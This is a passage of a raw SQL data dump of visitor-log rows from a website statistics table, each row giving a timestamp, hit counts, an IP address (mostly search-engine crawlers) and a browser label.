5923,1,1,0,0,'87.250.224.65','other'),(403800,1553355940,1,1,0,0,'178.154.244.11','other'),(403801,1553355996,1,1,0,0,'54.36.149.6','other'),(403802,1553356071,1,1,0,0,'66.249.64.58','chrome'),(403803,1553356417,1,1,0,0,'87.250.224.47','other'),(403804,1553356458,1,1,0,0,'66.249.64.31','chrome'),(403805,1553356645,1,1,0,0,'54.36.149.12','other'),(403806,1553356775,1,1,0,0,'66.249.64.62','chrome'),(403807,1553356898,1,1,0,0,'66.249.64.30','chrome'),(403808,1553356980,1,1,0,0,'54.36.150.50','other'),(403809,1553357087,1,1,0,0,'178.154.244.11','other'),(403810,1553357133,1,1,0,0,'157.55.39.167','other'),(403811,1553357393,2,2,0,0,'5.45.207.19','other'),(403812,1553357567,1,1,0,0,'40.77.167.0','other'),(403813,1553357994,1,1,0,0,'176.36.160.173','other'),(403814,1553358525,1,1,0,0,'54.36.148.49','other'),(403815,1553359027,1,1,0,0,'54.36.149.64','other'),(403816,1553359093,1,1,0,0,'54.36.148.225','other'),(403817,1553359141,1,1,0,0,'46.229.168.137','other'),(403818,1553359247,2,2,0,0,'66.249.64.31','chrome'),(403819,1553359303,1,1,0,0,'54.36.148.210','other'),(403820,1553359383,1,1,0,0,'54.36.148.85','other'),(403821,1553359530,1,1,0,0,'40.77.167.0','other'),(403822,1553359748,1,1,0,0,'37.9.113.148','other'),(403823,1553359765,1,1,0,0,'66.249.64.60','chrome'),(403824,1553359766,1,1,0,0,'54.36.148.212','other'),(403825,1553359845,1,1,0,0,'54.36.149.60','other'),(403826,1553359850,1,1,0,0,'54.36.150.74','other'),(403827,1553359921,1,1,0,0,'46.229.168.145','other'),(403828,1553360127,1,1,0,0,'66.249.64.29','chrome'),(403829,1553360417,1,1,0,0,'54.36.148.119','other'),(403830,1553360445,1,1,0,0,'46.229.168.141','other'),(403831,1553360497,1,1,0,0,'178.154.244.11','other'),(403832,1553360568,1,1,0,0,'54.36.148.237','other'),(403833,1553360642,1,1,0,0,'54.36.148.88','other'),(403834,1553360727,1,1,0,0,'54.36.150.112','other'),(403835,1553360767,1,1,0,0,'40.77.167.0','other'),(403836,1553360877,1,1,0,0,'66.249.64.58','chrome'),(403837,1553361190,1,1,0,0,'46.229.168.151','other'),(403838,1553361222,1,1,0,0,'54.36.149.3','other'),(403839,1553361251,1,1,0,0,'54.36.149.53','other'),(403840,1553361278,1,1,0,0,'54.36.148.156','other'),(403841,1553361302,1,1,0,0,'207.46.13.213','other'),(403842,1553361529,1,1,0,0,'54.36.148.190','other'),(403843,1553361696,2,2,0,0,'95.108.213.4','other'),(403844,1553361947,1,1,0,0,'91.196.178.67','firefox'),(403845,1553361985,1,1,0,0,'87.250.224.47','other'),(403846,1553362019,1,1,0,0,'91.209.11.236','other'),(403847,1553362107,1,1,0,0,'54.36.148.242','other'),(403848,1553362360,1,1,0,0,'5.45.207.79','other'),(403849,1553362363,1,1,0,0,'37.9.113.148','other'),(403850,1553362848,1,1,0,0,'91.196.178.132','chrome'),(403851,1553362900,1,1,0,0,'66.249.64.30','chrome'),(403852,1553363024,1,1,0,0,'66.249.64.60','chrome'),(403853,1553363031,2,2,0,0,'66.249.64.29','chrome'),(403854,1553363085,1,1,0,0,'66.249.64.62','chrome'),(403855,1553363149,1,1,0,0,'157.55.39.148','other'),(403856,1553363265,1,1,0,0,'46.229.168.144','other'),(403857,1553363671,1,1,0,0,'66.249.64.58','chrome'),(403858,1553363732,1,1,0,0,'95.108.213.4','other'),(403859,1553363956,1,1,0,0,'5.45.207.79','other'),(403860,1553364279,2,2,0,0,'66.249.64.29','chrome'),(403861,1553364815,1,1,0,0,'66.249.64.31','chrome'),(403862,1553365115,1,1,0,0,'54.36.150.91','other'),(403863,1553365142,1,1,0,0,'46.229.168.151','other'),(403864,1553365181,1,1,0,0,'66.249.64.58','chrome'),(403865,1553365366,1,1,0,0,'5.196.87.171','other'),(403866,1553365430,1,1,0,0,'8.29.198.27','other'),(403867,1553365540,1,1,0,0,'8.29.198.25','other'),(403868,1553365554,1,1,0,0,'54.36.148.6','other'),(403869,1553365769,1,1,0,0,'167.114.157.79','other'),(403870,1553365814,1,1,0,0,'167.114.157.79','chrome'),(403871,1553365905,1,1,0,0,'54.36.148.82','other'),(403872,1553366320,1,1,0,0,'157.55.39.148','other'),(403873,1553366324,1,1,0,0,'157.55.39.167','other'),(403874,1553366452,1,1,0,0,'54.36.148.28','other'),(403875,1553366475,1,1,0,0,'54.36.148.104','other'),(403876,1553366931,1,1,0,0,'54.36.150.89','other'),(403877,1553367736,1,1,0,0,'54.36.150.13','other'),(403878,1553367785,1,1,0,0,'54.36.149.26','other'),(403879,1553368385,2,2,0,0,'87.250.224.47','other'),(403880,1553368390,6,6,0,0,'178.154.244.11','other'),(403881,1553368453,1,1,0,0,'54.36.149.25','other'),(403882,1553368603,2,2,0,0,'95.108.213.4','other'),(403883,1553368662,2,2,0,0,'37.9.113.148','other'),(403884,1553368845,2,2,0,0,'5.45.207.79','other'),(403885,1553368902,2,2,0,0,'5.45.207.19','other'),(403886,1553369057,1,1,0,0,'5.255.253.38','other'),(403887,1553369126,1,1,0,0,'54.36.148.18','other'),(403888,1553369170,1,1,0,0,'178.154.171.17','other'),(403889,1553369217,1,1,0,0,'54.36.148.240','other'),(403890,1553369245,1,1,0,0,'54.36.148.201','other'),(403891,1553369425,1,1,0,0,'54.36.148.143','other'),(403892,1553369625,1,1,0,0,'95.108.181.54','other'),(403893,1553369923,1,1,0,0,'216.244.66.241','other'),(403894,1553370161,1,1,0,0,'54.36.148.28','other'),(403895,1553370862,1,1,0,0,'13.66.139.0','other'),(403896,1553370953,1,1,0,0,'54.36.149.70','other'),(403897,1553370965,1,1,0,0,'46.229.168.149','other'),(403898,1553371078,1,1,0,0,'207.46.13.120','other'),(403899,1553371333,1,1,0,0,'46.201.174.188','chrome'),(403900,1553371527,1,1,0,0,'54.36.148.12','other'),(403901,1553371692,1,1,0,0,'46.229.168.150','other'),(403902,1553371796,1,1,0,0,'54.36.148.66','other'),(403903,1553371846,1,1,0,0,'46.229.168.130','other'),(403904,1553372403,1,1,0,0,'157.55.39.183','other'),(403905,1553372580,1,1,0,0,'46.211.133.46','chrome'),(403906,1553372680,1,1,0,0,'66.249.64.30','chrome'),(403907,1553372764,1,1,0,0,'54.36.148.248','other'),(403908,1553372785,1,1,0,0,'54.36.148.97','other'),(403909,1553372802,1,1,0,0,'54.36.148.51','other'),(403910,1553373089,1,1,0,0,'46.229.168.133','other'),(403911,1553373103,1,1,0,0,'54.36.148.153','other'),(403912,1553373243,1,1,0,0,'207.46.13.120','other'),(403913,1553373323,1,1,0,0,'180.76.15.19','other'),(403914,1553373397,1,1,0,0,'157.55.39.167','other'),(403915,1553373612,1,1,0,0,'46.229.168.142','other'),(403916,1553373706,1,1,0,0,'46.229.168.146','other'),(403917,1553373901,1,1,0,0,'54.36.150.149','other'),(403918,1553374188,1,1,0,0,'66.249.64.31','chrome'),(403919,1553374329,1,1,0,0,'54.36.150.71','other'),(403920,1553374331,1,1,0,0,'54.36.150.123','other'),(403921,1553374488,1,1,0,0,'46.229.168.148','other'),(403922,1553374645,1,1,0,0,'46.229.168.139','other'),(403923,1553374653,1,1,0,0,'213.180.203.9','other'),(403924,1553374766,4,4,0,0,'5.45.207.79','other'),(403925,1553374774,1,1,0,0,'87.250.224.47','other'),(403926,1553374782,1,1,0,0,'66.249.64.30','chrome'),(403927,1553374839,1,1,0,0,'5.45.207.19','other'),(403928,1553374843,1,1,0,0,'66.249.64.60','chrome'),(403929,1553374848,1,1,0,0,'66.249.64.62','chrome'),(403930,1553374880,1,1,0,0,'66.249.64.29','chrome'),(403931,1553374922,1,1,0,0,'54.36.150.108','other'),(403932,1553374947,1,1,0,0,'54.36.149.85','other'),(403933,1553375019,1,1,0,0,'54.36.149.6','other'),(403934,1553375105,1,1,0,0,'95.108.213.4','other'),(403935,1553375249,2,2,0,0,'37.9.113.148','other'),(403936,1553375342,1,1,0,0,'54.36.150.190','other'),(403937,1553375863,1,1,0,0,'54.36.148.28','other'),(403938,1553375902,1,1,0,0,'54.36.150.56','other'),(403939,1553376139,1,1,0,0,'157.55.39.167','other'),(403940,1553376166,1,1,0,0,'54.36.150.52','other'),(403941,1553376213,1,1,0,0,'54.36.149.107','other'),(403942,1553376278,1,1,0,0,'8.29.198.27','other'),(403943,1553376377,1,1,0,0,'8.29.198.25','other'),(403944,1553376696,1,1,0,0,'54.36.149.5','other'),(403945,1553376798,1,1,0,0,'178.154.244.11','other'),(403946,1553377134,1,1,0,0,'66.249.64.30','chrome'),(403947,1553377207,1,1,0,0,'66.249.64.29','chrome'),(403948,1553377583,1,1,0,0,'207.46.13.17','other'),(403949,1553377610,1,1,0,0,'66.249.64.31','chrome'),(403950,1553377703,1,1,0,0,'54.36.148.193','other'),(403951,1553377836,1,1,0,0,'46.229.168.143','other'),(403952,1553378171,1,1,0,0,'54.36.148.93','other'),(403953,1553378181,1,1,0,0,'54.36.149.86','other'),(403954,1553378839,1,1,0,0,'46.229.168.136','other'),(403955,1553379069,1,1,0,0,'54.36.148.7','other'),(403956,1553379172,1,1,0,0,'66.249.64.60','chrome'),(403957,1553379190,1,1,0,0,'66.249.64.30','chrome'),(403958,1553379425,1,1,0,0,'66.249.64.31','chrome'),(403959,1553379787,1,1,0,0,'40.77.167.76','other'),(403960,1553380018,1,1,0,0,'54.36.148.133','other'),(403961,1553380100,1,1,0,0,'66.249.64.29','chrome'),(403962,1553380222,1,1,0,0,'207.46.13.17','other'),(403963,1553380428,1,1,0,0,'54.36.148.12','other'),(403964,1553380562,1,1,0,0,'37.9.113.148','other'),(403965,1553380663,1,1,0,0,'54.36.148.206','other'),(403966,1553380723,1,1,0,0,'54.36.148.124','other'),(403967,1553380781,1,1,0,0,'37.9.113.20','other'),(403968,1553380877,1,1,0,0,'178.154.244.49','other'),(403969,1553380880,1,1,0,0,'54.36.148.165','other'),(403970,1553380960,2,2,0,0,'213.180.203.17','other'),(403971,1553381308,1,1,0,0,'66.249.64.29','chrome'),(403972,1553381368,1,1,0,0,'66.249.64.60','chrome'),(403973,1553381542,1,1,0,0,'40.77.167.76','other'),(403974,1553381745,1,1,0,0,'157.55.39.144','other'),(403975,1553381784,1,1,0,0,'66.249.64.31','chrome'),(403976,1553382347,2,2,0,0,'46.229.168.142','other'),(403977,1553382698,1,1,0,0,'157.55.39.144','other'),(403978,1553382742,1,1,0,0,'54.36.148.218','other'),(403979,1553382951,1,1,0,0,'66.249.64.60','chrome'),(403980,1553383005,1,1,0,0,'54.36.150.26','other'),(403981,1553383042,1,1,0,0,'54.36.149.74','other'),(403982,1553383277,1,1,0,0,'54.36.148.162','other'),(403983,1553383536,1,1,0,0,'54.36.150.188','other'),(403984,1553383595,2,2,0,0,'66.249.64.30','chrome'),(403985,1553383952,1,1,0,0,'54.36.148.137','other'),(403986,1553384085,1,1,0,0,'46.229.168.133','other'),(403987,1553384575,1,1,0,0,'207.46.13.120','other'),(403988,1553384743,1,1,0,0,'54.36.150.125','other'),(403989,1553384774,1,1,0,0,'46.229.168.144','other'),(403990,1553385163,1,1,0,0,'54.36.149.38','other'),(403991,1553385781,1,1,0,0,'54.36.150.163','other'),(403992,1553386150,2,2,0,0,'37.9.113.148','other'),(403993,1553386536,2,2,0,0,'66.249.64.58','chrome'),(403994,1553386724,1,1,0,0,'54.36.148.180','other'),(403995,1553386970,1,1,0,0,'46.229.168.149','other'),(403996,1553387017,1,1,0,0,'54.36.148.219','other'),(403997,1553387052,2,2,0,0,'66.249.64.29','chrome'),(403998,1553387121,1,1,0,0,'8.29.198.27','other'),(403999,1553387138,1,1,0,0,'66.249.64.30','chrome'),(404000,1553387217,1,1,0,0,'8.29.198.25','other'),(404001,1553387608,1,1,0,0,'54.36.148.3','other'),(404002,1553387860,2,2,0,0,'157.55.39.144','other'),(404003,1553387885,1,1,0,0,'46.229.168.149','other'),(404004,1553387949,1,1,0,0,'54.36.150.56','other'),(404005,1553388160,1,1,0,0,'46.229.168.153','other'),(404006,1553388195,1,1,0,0,'66.249.64.30','chrome'),(404007,1553388477,1,1,0,0,'46.229.168.148','other'),(404008,1553389008,1,1,0,0,'134.73.199.154','chrome'),(404009,1553389116,1,1,0,0,'46.229.168.138','other'),(404010,1553389175,1,1,0,0,'66.249.64.29','chrome'),(404011,1553389811,1,1,0,0,'54.36.150.188','other'),(404012,1553389814,1,1,0,0,'54.36.150.101','other'),(404013,1553390073,1,1,0,0,'66.249.64.30','chrome'),(404014,1553390178,1,1,0,0,'66.249.64.62','chrome'),(404015,1553390529,1,1,0,0,'207.46.13.155','other'),(404016,1553390872,2,2,0,0,'207.46.13.207','other'),(404017,1553391649,1,1,0,0,'66.249.64.62','chrome'),(404018,1553391975,1,1,0,0,'54.36.148.8','other'),(404019,1553392277,1,1,0,0,'46.229.168.148','other'),(404020,1553392587,2,2,0,0,'66.249.64.29','chrome'),(404021,1553392719,1,1,0,0,'46.229.168.130','other'),(404022,1553393172,1,1,0,0,'54.36.148.63','other'),(404023,1553393176,2,2,0,0,'46.229.168.141','other'),(404024,1553393292,1,1,0,0,'46.229.168.142','other'),(404025,1553393431,1,1,0,0,'40.77.167.49','other'),(404026,1553393915,1,1,0,0,'37.9.113.148','other'),(404027,1553394006,2,2,0,0,'5.45.207.79','other'),(404028,1553394297,2,2,0,0,'5.45.207.19','other'),(404029,1553394322,2,2,0,0,'66.249.64.29','chrome'),(404030,1553394358,1,1,0,0,'141.8.142.108','other'),(404031,1553394385,1,1,0,0,'95.108.181.75','other'),(404032,1553394465,1,1,0,0,'46.229.168.140','other'),(404033,1553394532,1,1,0,0,'157.55.39.144','other'),(404034,1553394675,1,1,0,0,'54.36.148.50','other'),(404035,1553394744,1,1,0,0,'95.108.213.4','other'),(404036,1553394748,1,1,0,0,'54.36.150.15','other'),(404037,1553394957,1,1,0,0,'54.36.148.86','other'),(404038,1553395110,1,1,0,0,'5.45.207.79','other'),(404039,1553395115,1,1,0,0,'178.154.244.11','other'),(404040,1553395323,2,2,0,0,'34.212.228.207','chrome'),(404041,1553395843,1,1,0,0,'46.229.168.153','other'),(404042,1553395863,1,1,0,0,'157.55.39.144','other'),(404043,1553396302,1,1,0,0,'46.229.168.132','other'),(404044,1553396505,1,1,0,0,'54.36.150.156','other'),(404045,1553396691,1,1,0,0,'54.36.148.220','other'),(404046,1553396777,1,1,0,0,'46.229.168.130','other'),(404047,1553397020,1,1,0,0,'46.229.168.136','other'),(404048,1553397112,1,1,0,0,'54.36.148.18','other'),(404049,1553397453,1,1,0,0,'46.229.168.146','other'),(404050,1553397647,1,1,0,0,'109.74.154.72','chrome'),(404051,1553397956,1,1,0,0,'8.29.198.27','other'),(404052,1553398056,1,1,0,0,'8.29.198.25','other'),(404053,1553398122,1,1,0,0,'46.229.168.133','other'),(404054,1553398144,1,1,0,0,'54.36.150.41','other'),(404055,1553398176,1,1,0,0,'54.36.150.98','other'),(404056,1553398376,1,1,0,0,'40.77.167.49','other'),(404057,1553398408,1,1,0,0,'66.249.64.58','chrome'),(404058,1553398783,1,1,0,0,'46.229.168.130','other'),(404059,1553399071,1,1,0,0,'46.229.168.154','other'),(404060,1553399343,1,1,0,0,'66.249.64.31','chrome'),(404061,1553399384,1,1,0,0,'66.249.64.60','chrome'),(404062,1553399496,1,1,0,0,'40.77.167.85','other'),(404063,1553399523,1,1,0,0,'54.36.148.146','other'),(404064,1553399576,1,1,0,0,'40.77.167.96','other'),(404065,1553399687,1,1,0,0,'54.36.148.11','other'),(404066,1553399712,1,1,0,0,'54.36.149.84','other'),(404067,1553399904,2,2,0,0,'66.249.64.62','chrome'),(404068,1553400346,1,1,0,0,'54.36.150.26','other'),(404069,1553400510,1,1,0,0,'46.229.168.145','other'),(404070,1553400701,1,0,1,0,'66.249.64.31',''),(404071,1553400702,1,1,0,0,'54.36.150.108','other'),(404072,1553401022,1,1,0,0,'54.36.148.133','other'),(404073,1553401028,1,1,0,0,'54.36.148.72','other'),(404074,1553401184,1,1,0,0,'54.36.150.12','other'),(404075,1553401188,1,1,0,0,'54.36.148.98','other'),(404076,1553401221,1,1,0,0,'180.76.15.23','other'),(404077,1553401460,1,1,0,0,'66.249.64.62','chrome'),(404078,1553401588,1,1,0,0,'54.36.148.96','other'),(404079,1553401897,1,1,0,0,'46.229.168.137','other'),(404080,1553402105,1,1,0,0,'54.36.149.76','other'),(404081,1553402248,1,1,0,0,'46.229.168.148','other'),(404082,1553402677,1,1,0,0,'207.46.13.198','other'),(404083,1553402724,1,1,0,0,'54.36.148.201','other'),(404084,1553402898,1,1,0,0,'54.36.148.205','other'),(404085,1553403122,1,1,0,0,'54.36.150.176','other'),(404086,1553403549,2,2,0,0,'66.249.64.30','chrome'),(404087,1553403676,2,2,0,0,'66.249.64.29','chrome'),(404088,1553403698,1,1,0,0,'46.229.168.146','other'),(404089,1553403984,1,1,0,0,'54.36.148.184','other'),(404090,1553404497,1,1,0,0,'54.36.150.80','other'),(404091,1553404594,1,1,0,0,'54.36.148.129','other'),(404092,1553404732,2,2,0,0,'95.108.213.4','other'),(404093,1553404795,1,1,0,0,'37.9.113.20','other'),(404094,1553404799,1,1,0,0,'66.249.64.31','chrome'),(404095,1553404847,1,1,0,0,'95.108.181.54','other'),(404096,1553404889,1,1,0,0,'46.229.168.134','other'),(404097,1553405008,2,2,0,0,'157.55.39.236','other'),(404098,1553405072,3,3,0,0,'5.45.207.19','other'),(404099,1553405114,2,2,0,0,'178.154.244.11','other'),(404100,1553405175,3,3,0,0,'5.45.207.79','other'),(404101,1553405339,1,1,0,0,'54.36.150.66','other'),(404102,1553405756,1,1,0,0,'95.108.213.4','other'),(404103,1553405922,1,1,0,0,'54.36.150.139','other'),(404104,1553405938,1,1,0,0,'87.250.224.65','other'),(404105,1553405968,2,2,0,0,'87.250.224.47','other'),(404106,1553406076,1,1,0,0,'54.36.150.43','other'),(404107,1553406103,1,1,0,0,'207.46.13.24','other'),(404108,1553406433,2,2,0,0,'5.45.207.79','other'),(404109,1553406506,1,1,0,0,'46.229.168.147','other'),(404110,1553406643,1,1,0,0,'54.36.150.36','other'),(404111,1553406852,1,1,0,0,'54.36.150.106','other'),(404112,1553407159,1,1,0,0,'157.55.39.236','other'),(404113,1553407482,2,2,0,0,'91.196.178.177','chrome'),(404114,1553407694,1,1,0,0,'54.36.148.240','other'),(404115,1553407996,1,1,0,0,'46.229.168.135','other'),(404116,1553408107,1,1,0,0,'46.229.168.148','other'),(404117,1553408134,1,1,0,0,'207.46.13.198','other'),(404118,1553408537,1,1,0,0,'54.36.150.82','other'),(404119,1553408676,1,1,0,0,'46.211.98.249','chrome'),(404120,1553408755,1,1,0,0,'54.36.150.28','other'),(404121,1553408783,1,1,0,0,'109.70.100.22','other'),(404122,1553408796,1,1,0,0,'8.29.198.26','other'),(404123,1553408888,1,1,0,0,'8.29.198.25','other'),(404124,1553408906,1,1,0,0,'54.36.148.12','other'),(404125,1553408929,1,1,0,0,'66.249.64.30','chrome'),(404126,1553409296,1,1,0,0,'54.36.148.197','other'),(404127,1553409377,1,1,0,0,'54.36.148.231','other'),(404128,1553409563,1,1,0,0,'66.249.64.29','chrome'),(404129,1553409673,1,1,0,0,'54.36.148.232','other'),(404130,1553409809,1,1,0,0,'207.46.13.198','other'),(404131,1553409932,1,1,0,0,'46.229.168.150','other'),(404132,1553409942,1,1,0,0,'46.229.168.143','other'),(404133,1553410095,1,1,0,0,'157.55.39.236','other'),(404134,1553410164,1,1,0,0,'54.36.149.99','other'),(404135,1553410228,1,1,0,0,'46.229.168.129','other'),(404136,1553410401,1,1,0,0,'54.36.148.41','other'),(404137,1553410642,1,1,0,0,'46.229.168.153','other'),(404138,1553410777,1,1,0,0,'54.36.149.63','other'),(404139,1553410825,1,1,0,0,'54.36.148.239','other'),(404140,1553410833,1,1,0,0,'91.196.178.169','chrome'),(404141,1553411122,1,1,0,0,'46.229.168.144','other'),(404142,1553411194,1,1,0,0,'66.249.64.30','chrome'),(404143,1553411369,1,1,0,0,'188.163.32.233','firefox'),(404144,1553411423,1,1,0,0,'54.36.148.30','other'),(404145,1553411534,1,1,0,0,'66.249.64.60','chrome'),(404146,1553411805,1,1,0,0,'54.36.148.52','other'),(404147,1553412102,3,3,0,0,'207.46.13.24','other'),(404148,1553412141,1,1,0,0,'66.249.64.29','chrome'),(404149,1553412265,1,1,0,0,'54.36.148.229','other'),(404150,1553412521,1,1,0,0,'46.229.168.137','other'),(404151,1553412554,5,5,0,0,'207.46.13.198','other'),(404152,1553412561,5,5,0,0,'157.55.39.236','other'),(404153,1553412578,2,2,0,0,'157.55.39.240','other'),(404154,1553412624,2,2,0,0,'66.249.64.60','chrome'),(404155,1553412771,1,1,0,0,'66.249.64.58','chrome'),(404156,1553413009,2,2,0,0,'66.249.64.31','chrome'),(404157,1553413114,1,1,0,0,'54.36.150.181','other'),(404158,1553413618,1,1,0,0,'46.229.168.146','other'),(404159,1553413701,1,1,0,0,'180.76.15.28','other'),(404160,1553413838,1,1,0,0,'54.36.150.6','other'),(404161,1553414101,1,1,0,0,'54.36.148.52','other'),(404162,1553414525,1,1,0,0,'54.36.149.3','other'),(404163,1553414631,1,1,0,0,'46.229.168.137','other'),(404164,1553414721,1,1,0,0,'66.249.64.31','chrome'),(404165,1553414807,1,1,0,0,'66.249.64.29','chrome'),(404166,1553414917,1,1,0,0,'54.36.149.95','other'),(404167,1553415083,1,1,0,0,'54.36.148.93','other'),(404168,1553415239,1,1,0,0,'54.36.150.140','other'),(404169,1553416028,1,1,0,0,'5.196.87.172','other'),(404170,1553416138,1,1,0,0,'54.36.148.115','other'),(404171,1553416247,1,1,0,0,'54.36.148.253','other'),(404172,1553416254,1,1,0,0,'46.229.168.143','other'),(404173,1553416330,1,1,0,0,'54.36.148.147','other'),(404174,1553416352,1,1,0,0,'66.249.64.58','chrome'),(404175,1553416524,3,3,0,0,'66.249.64.29','chrome'),(404176,1553416780,1,1,0,0,'54.36.148.92','other'),(404177,1553417004,1,1,0,0,'66.249.64.30','chrome'),(404178,1553417049,1,1,0,0,'207.46.13.24','other'),(404179,1553417358,1,1,0,0,'54.36.148.107','other'),(404180,1553417527,1,1,0,0,'54.36.150.176','other'),(404181,1553417647,1,1,0,0,'66.249.64.58','chrome'),(404182,1553417677,1,1,0,0,'46.229.168.146','other'),(404183,1553418040,1,1,0,0,'54.36.149.83','other'),(404184,1553418143,1,1,0,0,'157.55.39.240','other'),(404185,1553418147,1,1,0,0,'66.249.64.30','chrome'),(404186,1553418179,1,1,0,0,'66.249.64.29','chrome'),(404187,1553418214,1,1,0,0,'46.229.168.150','other'),(404188,1553418254,1,1,0,0,'54.36.150.69','other'),(404189,1553418600,1,1,0,0,'46.229.168.132','other'),(404190,1553418735,1,1,0,0,'46.229.168.135','other'),(404191,1553418903,1,1,0,0,'46.229.168.154','other'),(404192,1553418969,1,1,0,0,'54.36.148.217','other'),(404193,1553419217,1,1,0,0,'207.46.13.24','other'),(404194,1553419548,1,1,0,0,'54.36.150.156','other'),(404195,1553419643,1,1,0,0,'8.29.198.27','other'),(404196,1553419718,1,1,0,0,'8.29.198.25','other'),(404197,1553419760,1,1,0,0,'66.249.64.60','chrome'),(404198,1553420048,1,1,0,0,'46.229.168.151','other'),(404199,1553420127,1,1,0,0,'54.36.148.99','other'),(404200,1553420571,2,2,0,0,'66.249.64.62','chrome'),(404201,1553420666,1,1,0,0,'207.46.13.3','other'),(404202,1553420863,1,1,0,0,'54.36.149.70','other'),(404203,1553421034,1,1,0,0,'207.46.13.24','other'),(404204,1553421054,1,1,0,0,'46.229.168.142','other'),(404205,1553421129,1,1,0,0,'66.249.64.29','chrome'),(404206,1553421140,1,1,0,0,'54.36.148.6','other'),(404207,1553421266,1,1,0,0,'46.229.168.145','other'),(404208,1553421426,1,1,0,0,'54.36.149.74','other'),(404209,1553421717,1,1,0,0,'54.36.149.16','other'),(404210,1553421877,1,1,0,0,'54.36.149.70','other'),(404211,1553422118,1,1,0,0,'94.23.208.210','chrome'),(404212,1553422348,1,1,0,0,'54.36.150.81','other'),(404213,1553422382,1,1,0,0,'54.36.148.167','other'),(404214,1553422415,1,1,0,0,'207.46.13.70','other'),(404215,1553422424,1,1,0,0,'54.36.149.12','other'),(404216,1553422550,1,1,0,0,'54.36.150.173','other'),(404217,1553422571,1,1,0,0,'54.36.148.39','other'),(404218,1553422891,1,1,0,0,'66.249.64.31','chrome'),(404219,1553422932,1,1,0,0,'95.163.255.44','other'),(404220,1553422934,1,1,0,0,'95.163.255.48','other'),(404221,1553422961,1,1,0,0,'54.36.148.131','other'),(404222,1553423016,1,1,0,0,'46.229.168.130','other'),(404223,1553423375,1,1,0,0,'54.36.148.254','other'),(404224,1553423381,1,1,0,0,'111.202.101.66','other'),(404225,1553423500,1,1,0,0,'54.36.148.98','other'),(404226,1553423767,1,1,0,0,'66.249.64.30','chrome'),(404227,1553423845,1,1,0,0,'66.249.64.29','chrome'),(404228,1553424031,1,1,0,0,'54.36.150.39','other'),(404229,1553424284,1,1,0,0,'91.196.178.181','chrome'),(404230,1553425107,1,1,0,0,'54.36.148.109','other'),(404231,1553425172,1,1,0,0,'54.36.148.79','other'),(404232,1553425371,1,1,0,0,'54.36.148.158','other'),(404233,1553425520,2,2,0,0,'66.249.64.29','chrome'),(404234,1553425732,1,1,0,0,'54.36.150.122','other'),(404235,1553425885,2,2,0,0,'66.249.64.31','chrome'),(404236,1553426106,1,1,0,0,'66.249.64.60','chrome'),(404237,1553426313,1,1,0,0,'54.36.148.79','other'),(404238,1553426384,1,1,0,0,'54.36.150.117','other'),(404239,1553426477,1,1,0,0,'54.36.150.25','other'),(404240,1553426520,1,1,0,0,'66.249.64.30','chrome'),(404241,1553426673,1,1,0,0,'66.249.64.29','chrome'),(404242,1553426905,1,1,0,0,'54.36.148.7','other'),(404243,1553427182,1,1,0,0,'46.229.168.150','other'),(404244,1553427234,1,1,0,0,'46.229.168.153','other'),(404245,1553427258,1,1,0,0,'66.249.64.62','chrome'),(404246,1553427582,2,2,0,0,'54.36.150.15','other'),(404247,1553427692,1,1,0,0,'46.211.97.118','chrome'),(404248,1553427725,1,1,0,0,'54.36.148.75','other'),(404249,1553427739,1,1,0,0,'141.8.132.16','other'),(404250,1553427746,1,1,0,0,'95.108.181.54','other'),(404251,1553427763,1,1,0,0,'178.154.200.48','other'),(404252,1553427852,1,1,0,0,'157.55.39.4','other'),(404253,1553427923,2,2,0,0,'87.250.224.81','other'),(404254,1553427962,1,1,0,0,'178.154.171.17','other'),(404255,1553428126,1,1,0,0,'87.250.224.65','other'),(404256,1553428217,1,1,0,0,'37.9.113.20','other'),(404257,1553428234,2,2,0,0,'178.154.171.24','other'),(404258,1553428264,1,1,0,0,'54.36.149.82','other'),(404259,1553428276,1,1,0,0,'87.250.224.107','other'),(404260,1553428282,1,1,0,0,'87.250.224.47','other'),(404261,1553428310,1,1,0,0,'66.249.64.60','chrome'),(404262,1553428475,1,1,0,0,'87.250.224.118','other'),(404263,1553428477,1,1,0,0,'5.255.253.25','other'),(404264,1553428500,1,1,0,0,'46.229.168.138','other'),(404265,1553428550,1,1,0,0,'178.154.244.11','other'),(404266,1553428675,1,1,0,0,'66.249.64.30','chrome'),(404267,1553428726,1,1,0,0,'207.46.13.3','other'),(404268,1553428964,1,1,0,0,'95.108.181.75','other'),(404269,1553429064,1,1,0,0,'66.249.64.62','chrome'),(404270,1553429130,22,22,0,0,'192.99.35.149','firefox'),(404271,1553429177,1,1,0,0,'192.99.35.149','other'),(404272,1553429259,1,1,0,0,'87.250.224.65','other'),(404273,1553429377,1,1,0,0,'46.229.168.141','other'),(404274,1553429405,1,1,0,0,'157.55.39.237','other'),(404275,1553429476,1,1,0,0,'46.229.168.153','other'),(404276,1553429544,1,1,0,0,'54.36.148.216','other'),(404277,1553429649,1,1,0,0,'54.36.148.215','other'),(404278,1553430123,1,1,0,0,'54.36.148.127','other'),(404279,1553430129,1,1,0,0,'54.36.150.158','other'),(404280,1553430171,1,1,0,0,'66.249.64.29','chrome'),(404281,1553430412,1,1,0,0,'54.36.148.153','other'),(404282,1553430497,1,1,0,0,'8.29.198.27','other'),(404283,1553430556,1,1,0,0,'8.29.198.26','other'),(404284,1553430738,1,1,0,0,'54.36.148.132','other'),(404285,1553431175,1,1,0,0,'54.36.150.76','other'),(404286,1553431293,1,1,0,0,'54.36.150.165','other'),(404287,1553432009,1,1,0,0,'54.36.150.123','other'),(404288,1553432112,1,1,0,0,'54.36.150.126','other'),(404289,1553432240,1,1,0,0,'54.36.149.65','other'),(404290,1553432326,1,1,0,0,'13.66.139.0','other'),(404291,1553432383,1,1,0,0,'66.249.64.30','chrome'),(404292,1553432424,1,1,0,0,'66.249.64.29','chrome'),(404293,1553432716,1,1,0,0,'66.249.64.62','chrome'),(404294,1553432847,1,1,0,0,'46.229.168.134','other'),(404295,1553432905,1,1,0,0,'54.36.150.36','other'),(404296,1553433019,2,2,0,0,'157.55.39.4','other'),(404297,1553433369,1,1,0,0,'46.229.168.149','other'),(404298,1553433416,1,1,0,0,'66.249.64.30','chrome'),(404299,1553433447,1,1,0,0,'46.229.168.137','other'),(404300,1553433450,1,1,0,0,'54.36.148.137','other'),(404301,1553433583,1,1,0,0,'157.55.39.237','other'),(404302,1553433631,1,1,0,0,'54.36.149.95','other'),(404303,1553433852,1,1,0,0,'40.77.167.17','other'),(404304,1553434056,1,1,0,0,'46.229.168.132','other'),(404305,1553434428,1,1,0,0,'54.36.148.56','other'),(404306,1553434648,1,1,0,0,'54.36.148.143','other'),(404307,1553434662,1,1,0,0,'54.36.150.55','other'),(404308,1553434715,1,1,0,0,'54.36.148.130','other'),(404309,1553434817,